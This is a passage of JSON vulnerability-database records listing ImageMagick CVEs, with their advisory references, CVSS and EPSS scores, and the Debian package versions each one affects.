"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/c78993d138bf480ab4652b5a48379d4ff75ba5f7", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/c78993d138bf480ab4652b5a48379d4ff75ba5f7" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1553", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1553" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html", "reference_id": "", "reference_type": "", "scores": [], "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html", "reference_id": "", "reference_type": "", "scores": [], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3IYH7QSNXXOIDFTYLY455ANZ3JWQ7FCS/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3IYH7QSNXXOIDFTYLY455ANZ3JWQ7FCS/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FS76VNCFL3FVRMGXQEMHBOKA7EE46BTS/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FS76VNCFL3FVRMGXQEMHBOKA7EE46BTS/" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1767812", "reference_id": "1767812", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1767812" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941670", "reference_id": "941670", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=941670" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15139", "reference_id": "CVE-2019-15139", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15139" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-15139" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vgvf-at1z-8ydr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49501?format=api", "vulnerability_id": "VCID-vrqg-4fke-mfay", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32547.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32547.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32547", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.2846", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28502", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28293", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28358", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28401", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28405", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28362", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28304", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28315", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28294", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28248", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28152", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32547" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32547", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32547" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442", "reference_id": "1016442", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091813", "reference_id": "2091813", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091813" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5534-1/", "reference_id": "USN-5534-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5534-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": 